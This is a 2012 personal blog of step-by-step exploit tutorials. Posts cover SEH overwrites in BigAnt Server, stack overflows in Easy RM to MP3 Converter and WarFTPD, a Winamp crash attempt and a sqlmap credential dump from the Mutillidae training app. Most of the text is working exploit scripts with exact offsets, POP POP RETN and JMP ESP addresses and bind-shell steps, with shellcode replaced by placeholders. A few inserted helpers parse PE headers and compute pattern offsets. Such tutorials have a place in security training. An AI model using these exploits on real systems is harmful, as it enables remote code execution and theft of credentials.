Sunday, 7 October 2012

EXPLOIT BIGANT SERVER (SEH PROTECTION)

Hello everyone, today I will discuss how to exploit the BigAnt server, whose process memory is guarded by a protection called SEH and SafeSEH.
Structured Exception Handling (SEH) is a mechanism provided by software and hardware to handle exceptions.

Ok, let's begin

1. Install BigAnt server and OllyDbg on Windows
Run BigAnt server, open OllyDbg and attach to the AntServer process

2. Next, prepare the fuzzer to attack the BigAnt server

#!/usr/bin/python
# Crash trigger: the USV command followed by 2500 "A" bytes (0x41).
# Byte literals work unchanged under both Python 2 and Python 3.
import socket

target_address = "192.168.43.128"
target_port = 6660
buffer = b"USV " + b"\x41" * 2500 + b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

3. Run the fuzzer and look at OllyDbg

The application has crashed; our junk data was delivered successfully.
To let execution continue, press Shift+F9

The EIP value changed to 41414141.
To see the data in the application's memory, right-click the row in the stack window > Follow in Dump;
the memory dump window then shows the buffer as it sits in memory.

There are several ways to get past the SEH protection; the most popular is the POP, POP, RETN method.
*You can find and learn that method in other articles.

4. Then look for a springboard address
We are looking for an address that holds the instructions POP, POP, RETN; that address will be used to overwrite the SEH handler address in the application.

I will look for that address in a module that was not compiled with the /SafeSEH option and does not have the IMAGE_DLLCHARACTERISTICS_NO_SEH flag set.
*You can check this using msfpescan on BackTrack
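
As an added example (not code from the original post), this is the kind of header check msfpescan performs and that a defender can run over the DLLs a product ships with: it reads the DllCharacteristics flags (NO_SEH, NX_COMPAT, DYNAMIC_BASE) and the Load Config data directory from a PE32 header. The header bytes are constructed by build_pe32_header purely to exercise the parser; reading the SEHandlerTable inside the Load Config structure, which needs RVA-to-file-offset mapping, is left out.

```python
import struct

# DllCharacteristics bits from the PE/COFF specification
DLLCHAR_DYNAMIC_BASE = 0x0040   # ASLR opt-in
DLLCHAR_NX_COMPAT = 0x0100      # DEP opt-in
DLLCHAR_NO_SEH = 0x0400         # image never uses SEH; no handler inside it is honoured
LOAD_CONFIG_INDEX = 10          # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG slot in the data directory


def seh_mitigation_flags(pe_bytes):
    """Read SEH-related hardening indicators from the headers of a PE32 image."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20  # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", pe_bytes, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    dll_chars = struct.unpack_from("<H", pe_bytes, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", pe_bytes, opt + 92)[0]
    load_cfg_size = 0
    if num_dirs > LOAD_CONFIG_INDEX:
        _rva, load_cfg_size = struct.unpack_from("<II", pe_bytes, opt + 96 + 8 * LOAD_CONFIG_INDEX)
    return {
        "no_seh": bool(dll_chars & DLLCHAR_NO_SEH),
        "has_load_config": load_cfg_size > 0,  # /SafeSEH stores its handler table here
        "nx_compat": bool(dll_chars & DLLCHAR_NX_COMPAT),
        "dynamic_base": bool(dll_chars & DLLCHAR_DYNAMIC_BASE),
    }


def lacks_seh_protection(flags):
    """True when the module has neither NO_SEH nor a Load Config directory, i.e. the
    kind of module the post picks for its POP POP RETN address. A Load Config
    directory can still hold an empty table, so a full audit also reads SEHandlerCount."""
    return not flags["no_seh"] and not flags["has_load_config"]


def build_pe32_header(dll_chars, load_cfg_size):
    """Constructed, non-loadable PE32 header used only to exercise the parser."""
    hdr = bytearray(64 + 4 + 20 + 224)  # DOS header, PE signature, COFF header, optional header
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 64)          # e_lfanew: PE signature right after the DOS header
    hdr[64:68] = b"PE\0\0"
    opt = 64 + 4 + 20
    struct.pack_into("<H", hdr, opt, 0x10B)        # PE32 magic
    struct.pack_into("<H", hdr, opt + 70, dll_chars)
    struct.pack_into("<I", hdr, opt + 92, 16)      # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 96 + 8 * LOAD_CONFIG_INDEX, 0x3000, load_cfg_size)
    return bytes(hdr)
```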

Here I use vbajet32.dll

In OllyDbg go to View - Executable Modules and double-click vbajet32.dll.
Once the CPU window shows vbajet32.dll, right-click - Search For - Sequence of Commands
and type POP r32, POP r32, RETN as in the picture below

We find such an address in vbajet32.dll at 0F9A196A.

5. Looking for the offset that overwrites SEH
I create a pattern of 2500 bytes and add it to the fuzzer

After adding that pattern to the fuzzer, run the fuzzer and look at OllyDbg

*Every time you run the fuzzer, OllyDbg and BigAnt need to be restarted

Press Shift+F9 to pass the exception on, and the following will be displayed

Record the value of the EIP register and check it using pattern_offset.

The conclusion: we need 966 bytes to reach the SEH handler.
Change the fuzzer buffer to 966 bytes.

buffer = b"USV "

buffer += b"\x90" * 962            # padding up to the SEH record
buffer += b"\xcc\xcc\xcc\xcc"      # the four bytes just before the SEH handler address
buffer += b"\x41\x41\x41\x41"      # lands in the SEH handler address (offset 966)

buffer += b"\x90" * (2504 - len(buffer))
buffer += b"\r\n\r\n"

Here I change the four bytes just before the SEH handler address to \xcc; the SEH handler address itself is overwritten with \x41.

Restart OllyDbg and the BigAnt server, then run the fuzzer once again.
Pass the exception on by pressing Shift+F9

The \x41 bytes from the buffer have landed in the SEH handler. So far everything is going as expected.

6. Control the CPU
Add the vbajet32.dll address (0F9A196A) to the buffer, written in little-endian format

buffer = b"USV "
buffer += b"\x90" * 962
buffer += b"\xcc\xcc\xcc\xcc"
buffer += b"\x6A\x19\x9A\x0f"      # 0F9A196A in little-endian format; becomes the EIP value
buffer += b"\x90" * (2504 - len(buffer))
buffer += b"\r\n\r\n"

Before running the fuzzer, set a breakpoint at the SEH address.
Restart OllyDbg and the BigAnt server, then run the fuzzer once again.

The process breaks right as it is about to execute the SEH address. Then press Shift+F9

Look for space to store the payload.

Right-click the first address - Follow in Dump - Selection

There is a large amount of empty memory at these addresses. To redirect to the stack address a jump of 6 bytes is required.
Then create the shellcode and avoid bad characters.

*See the book HARMLESS HACKING by MADA R. PERDANA or other articles.

Final fuzzer

#!/usr/bin/python
import socket
target_address = "192.168.43.128"
target_port = 6660
buffer = b"USV "
buffer += b"\x90" * 962
buffer += b"\xeb\x06\x90\x90"   # JMP SHORT 6 (over the SEH handler address), then NOP padding
buffer += b"\x6A\x19\x9A\x0f"   # SEH handler overwrite: 0F9A196A (POP POP RETN) little-endian
buffer += b"\x90" * 16          # NOP padding before the shellcode
buffer += b"SHELLCODE_PLACEHOLDER"   # the encoded shellcode bytes from the original post are omitted here
buffer += b"\x90" * (2504 - len(buffer))
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

Run the BigAnt server without OllyDbg, run the fuzzer, then telnet to the target IP.

CMIIW

Thursday, 27 September 2012

EXPLOIT WINAMP MUSIC PLAYER (SEH)

This time I try to exploit Winamp v5.572 and make it crash.

From yesterday until now I have not found the right fuzzer to make it crash.
I tried to write a fuzzer script that builds a .swf file; after running the fuzzer to generate the .swf file, I open that file in Winamp.

#!/usr/bin/python
# Writes 700 "A" bytes into a file with a .swf extension for Winamp to open.
buffer = b"\x41" * 700
path = "tets.swf"
with open(path, "wb") as f:
    f.write(buffer)
print("sukses gawe file")

And what happens??? Winamp has crashed.

When I run Winamp under OllyDbg, I don't see the junk data that I sent.

But I do see a difference before and after running the fuzzer. Note the pictures below:

Before

After

Until now I'm still confused, and I'll keep trying to exploit this application. TRY HARDER !!!

PRAY FOR ME

Tuesday, 25 September 2012

STACK OVERFLOW EASY RM TO MP3 CONVERTER (NON SEH)

This time I will explore how to exploit Easy RM to MP3 Converter.
You need to know that this application is non-SEH. You can look up the meaning of SEH on the internet or anywhere else.

Ok let's begin

1. First we must have OllyDbg and Easy RM to MP3 Converter to start the exploitation

Install and run them on Windows in VirtualBox

2. Then we need Python or something similar to write a fuzzer application for the exploit.
I use Python to write the fuzzer.

I try to type a fuzzer like this

#!/usr/bin/python
# Writes "http://" followed by 28000 "A" bytes into a .ram playlist file.
buffer = b"http://" + b"\x41" * 28000
path = "pusing1.ram"
with open(path, "wb") as f:
    f.write(buffer)
print("sukses gawe file")

This means I try to send 28000 bytes of junk, and the output file is pusing1.ram.
Save the script to your directory, then run the fuzzer from the BackTrack console.
In this case I saved the fuzzer in the shared folder directory to make this file easy to access.

We can see that once the fuzzer is run it generates output. Look at the picture below: pusing1.ram is the output file

3. Run Easy converter under OllyDbg, and load the output file 'pusing1.ram' into Easy converter.
See what happens in OllyDbg: the CPU registers in OllyDbg will show an error / crash

4. Now that we know the application crashes with 28000 bytes, we generate a pattern of that length using pattern_create.rb. Then copy and paste it into the fuzzer.

5. Rerun the fuzzer, and see what happens in the CPU registers. The EIP value changed to 326D4831

Then we calculate at which position it crashes using pattern_offset.rb

EIP crashes at 5825 and 26105; ESP crashes at 5833 and 26113.
I tried 5825 but it did not cause a crash; then I used 26105 and the result really was a crash

buffer = b"http://" + b"\x90" * 26105
buffer += b"\xEF\xBE\xAD\xDE"      # DEADBEEF marker, should land in EIP

The EIP value changed to DEADBEEF.

Then I add the ESP value to the fuzzer

buffer = b"http://" + b"\x90" * 26105
buffer += b"\xEF\xBE\xAD\xDE"      # DEADBEEF marker for EIP
buffer += b"http://" + b"\x90" * (26113 - len(buffer))
buffer += b"http://" + b"\xCC" * (28000 - len(buffer))   # fill the rest with \xCC so the stack is easy to spot

Rerun the fuzzer, and you will see

The stack window in OllyDbg contains junk data in the form of the character \xCC.

6. After that, following the exploitation strategy, we try to find a JMP ESP.
Run the target application under OllyDbg. On the View menu select Executable modules

Double-click SHELL32.dll then search for JMP ESP

We find an address in shell32.dll that contains the JMP ESP instruction.

The address found is 7C9D30D7. We make the fuzzer set the EIP register to the address of JMP ESP inside shell32.dll.
First we must convert that address to little-endian format, from 7C9D30D7 to \xD7\x30\x9D\x7C.
So the fuzzer is

buffer = b"http://" + b"\x90" * 26105
buffer += b"\xD7\x30\x9D\x7C"      # 7C9D30D7 (JMP ESP in shell32.dll) in little-endian format
buffer += b"http://" + b"\x90" * (26113 - len(buffer))
buffer += b"http://" + b"\xCC" * (28000 - len(buffer))

Then set a breakpoint at address 7C9D30D7.
Run Easy converter under OllyDbg and rerun the fuzzer. See what happens

In the CPU registers we find SHELL32.7C9D30D7 right at the EIP address; OllyDbg halts execution at 7C9D30D7 on the breakpoint.

7. The last step is to generate the payload with the Metasploit Framework. Choose Win32 bind shell, fill in the data as in the picture below, and click the Generate button

Copy and paste the payload into the fuzzer

#!/usr/bin/python
buffer = b"http://" + b"\x90" * 26105
buffer += b"\xD7\x30\x9D\x7C"      # EIP -> JMP ESP in shell32.dll (7C9D30D7, little-endian)
#buffer += b"http://" + b"\x90" * (26113 - len(buffer))
#buffer += b"http://" + b"\xCC" * (28000 - len(buffer))
buffer += b"\x90" * 32             # NOP sled where ESP lands
buffer += b"SHELLCODE_PLACEHOLDER"   # the Metasploit bind-shell payload bytes from the original post are omitted here
path = "pusing6.ram"
with open(path, "wb") as f:
    f.write(buffer)
print("sukses gawe file")

Run Easy converter without OllyDbg, then open / load the fuzzer's file.

Wow, Easy converter has crashed

After running the fuzzer file, use telnet to connect to the Windows XP system on port 4444.

You can see what happens....

CMIIW

Tuesday, 18 September 2012

BUFFER OVERFLOW : WARFTPD (NON-SEH APPLICATION)

1. Install and run WarFTPD on Windows in VirtualBox

2. Then write a simple fuzzer in Python and save it with the .py extension on BackTrack.
I saved it on BackTrack with the name xfuzz.py

Fuzzer script:

import socket

# Junk buffer sent as the FTP user name.
buffer = b"\x41" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.43.128", 21))
data = s.recv(1024)                     # read the FTP banner
print("sending evil data via user command...")
s.send(b"USER " + buffer + b"\r\n")
data = s.recv(1024)
s.send(b"PASS PASSWORD " + b"\r\n")
s.close()
print("Finish")

Warning: whitespace (indentation) is significant in Python.


3. To run the WarFTP server choose Properties - Start Service; the status of WarFTP will then be idle.

I tried to connect to the FTP server using nc; if it succeeds you will see something like the picture below

Then I tried to run the fuzzer from the BackTrack console,

Note the WarFTP window: if the fuzzer succeeds and makes the application crash, WarFTP disappears from the screen by itself.

Every time you fuzz WarFTP the application crashes and its configuration is saved to the file FtpDaemon.dat.
To re-run the WarFTP server and prevent the error message, delete the file FtpDaemon.dat

4. Re-run the WarFTP server and add a dummy user via the User Security Properties.

Then run OllyDbg to debug the WarFTP server.

After adding the new user, repeat the fuzzing process. This time WarFTPD does not display an error message.

Then run WarFTP via OllyDbg and re-run the fuzzer.

Before the fuzzer

After the fuzzer

What happens to the registers when the crash occurs can be seen clearly.
Four registers are affected by the fuzzer: ESP, EDI, EBP and EIP

5. Pattern create
One of the tools in Metasploit that can be used in vulnerability development is pattern_create.
Its purpose is to find the exact location of a string within the data the fuzzer sends to the application.

From the console go to the folder /pentest/exploits/framework/tools

To produce a thousand bytes of pattern data run this command:
./pattern_create.rb 1000 > string_pattern.txt

It will be saved as string_pattern.txt

Open string_pattern.txt, copy the pattern and add it to xfuzz.py as the buffer.

Then run the fuzzer against WarFTP again and note the registers of the WarFTP server

6. Pattern offset
This tool calculates how many bytes into the pattern generated by pattern_create.rb a given value sits.

We see that 485 bytes are needed to reach the EIP register

Add this line to the xfuzz.py script:
buffer = b"\x90" * 485

Run the fuzzer against WarFTP once more and note the EIP register.

We can see that the EIP register changed to DEADBEEF
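
The pattern_create.rb / pattern_offset.rb steps of this post, and of the Easy RM to MP3 and BigAnt posts above, as an added Python 3 example (not code from the original posts nor from Metasploit): cyclic_pattern builds the same Aa0Aa1... sequence, register_to_bytes reverses a register value read from OllyDbg because x86 stores it little-endian, and pattern_offsets reports every position that value occupies. With the Easy RM post's EIP value 326D4831 and a 28000-byte pattern it should return the offsets 5825 and 26105 that the post found.

```python
import string

PERIOD = 26 * 26 * 10 * 3   # 20280 bytes: after this the Aa0Aa1... sequence repeats


def cyclic_pattern(length):
    """Build the Metasploit-style pattern Aa0Aa1Aa2...Zz9. Every 3-byte triple
    (uppercase, lowercase, digit) is unique within one period, so any 4-byte window
    identifies a single position; longer buffers wrap and yield repeated hits."""
    period = b"".join((up + lo + dg).encode()
                      for up in string.ascii_uppercase
                      for lo in string.ascii_lowercase
                      for dg in string.digits)
    assert len(period) == PERIOD
    return (period * (length // PERIOD + 1))[:length]


def register_to_bytes(hex_value):
    """Convert a register value as OllyDbg shows it (e.g. '326D4831') into the byte
    order it has in memory: x86 is little-endian, so the four bytes are reversed."""
    if len(hex_value) != 8:
        raise ValueError("expected a 32-bit register value as 8 hex digits")
    return bytes.fromhex(hex_value)[::-1]


def pattern_offsets(pattern, hex_value):
    """Return every offset in `pattern` at which the register's bytes occur. More
    than one hit means the buffer exceeded one period, which is why the Easy RM post
    sees both 5825 and 26105 and has to try each."""
    needle = register_to_bytes(hex_value)
    hits, start = [], 0
    while True:
        pos = pattern.find(needle, start)
        if pos < 0:
            return hits
        hits.append(pos)
        start = pos + 1
```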

TO BE CONTINUED...

Monday, 17 September 2012

SQL INJECTION BYPASS : MUTILLIDAE

1. First start Apache and MySQL

2. Open Mutillidae by typing localhost/mutillidae in the browser

3. Set your browser's proxy to localhost port 8080

4. Open Burp Suite and set the target to localhost

Then watch what happens when we click the login button in Mutillidae. Burp Suite successfully intercepts the Mutillidae traffic. See the picture below:

This is the result of the interception; you will see information such as the POST request to localhost with the username and password POST parameters

5. Next open sqlmap, and test it to identify the backend database

As a result we get some databases:

6. We got some databases; I tried to get the tables from the database nowasp

And the result

7. Then I try to get the columns of the table accounts

Result:

8. Finally we get the columns of the accounts table; then I'll try to dump the usernames

As the result:

Dump the passwords

9. Last step: I go into the MySQL shell

At the root prompt type: mysql -h [host] -u user -p

I got it !!!

CMIIW